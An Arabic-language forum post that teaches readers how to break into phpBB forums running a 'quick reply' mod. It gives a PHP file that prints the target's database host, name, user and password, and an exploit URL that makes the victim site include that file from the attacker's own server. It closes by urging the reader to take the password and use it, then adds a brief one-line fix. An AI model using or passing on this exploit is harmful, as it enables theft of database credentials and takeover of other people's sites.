xxxXXX
اختراق منتديات phpbb
السلام عليكم...
بعد التحية شباب..اقدم اليكم هذه الثغره الممتعه في اختراق منتديات phpbb
طبعا الثغرة شغاله على المنتديات التي تحمل ((هاك الرد السريع))..
ولي ماتحمل هذا الهاك فعلم انك لن تستطيع الأختراق بهذه الثغره
---------------------------------
الشرح:::
اولا انشئ مستند نصي جديد وسمة extension.inc
وضع داخلها مثلا
شفرة
include('config'.'.php');
echo "DB Type: $dbms
";
echo "DB Host: $dbhost
";
echo "DB Name: $dbname
";
echo "DB User: $dbuser
";
echo "DB Pas
$dbpasswd
";
exit;
?>
وطبعا بأمكانك وضع الخيارات التي تود مشاهدتها من الهاك...
الحين بقى عليك تحميل الملف النصي إلى موقع يدعم php ...ومثال على ذالك موقع لايكوس [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
بعد ماترفع الملف إلى موقع يدعم php ...بكل سهوله طبقة هذا الأمر
URL: [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]BB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
حيث أن [phpBB_Forum]
موقع الظحية..اعني الموقع المستهدف
و
[Your Server]
مكان الملف الذي قمت برفعه إلى المساحة المجانية..
ولحين أظغط Enter
الحين عندك قاعدة البيانات تبع الموقع.. :) أخذ كلمة المرور وشتغل؛؛؛
-----------------------------------------------
الحل لإغلاق هذه الثغرة..:::
أفتح ملف quick_reply.php
أبحث عن
if ( $mode == 'smilies' )
أَضف بعدها مباشرة
phpbb_root_path = "./";
-----------------------------------------------
الحين خلاص تم إغلاق هذه الثغرة..
--------
أنت غير مسجل في منتديات ليـــال . للتسجيل الرجاء اضغط هنـا 
اختراق المنتديات!! لا تزعل يا مدير المنتدى!! 
العرض العادي
